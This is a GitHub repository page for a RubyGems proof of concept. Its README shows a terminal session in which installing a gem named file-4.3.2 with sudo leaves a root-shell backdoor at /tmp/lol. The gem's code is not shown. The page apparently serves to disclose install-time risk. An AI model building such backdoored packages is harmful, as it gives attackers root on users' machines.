Skip to content
master
Switch branches/tags
Go to file
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 

README

RubyGems exploit PoC
====================

This PoC demonstrates how a ruby gem can execute code as root when it's installed.

$ ls -la /tmp/lol
ls: cannot access /tmp/lol: No such file or directory
2 $ sudo gem install file-4.3.2.gem 
Building native extensions.  This could take a while...
Successfully installed file-4.3.2
Parsing documentation for file-4.3.2
Done installing documentation for file after 0 seconds
1 gem installed
$ /tmp/lol
# id
uid=0(root) gid=1000(mark) groups=0(root),1000(mark),1003(admin)
# 

About

Ruby gem PoC that creates a local root backdoor

Resources

License

Releases

No releases published

Packages

No packages published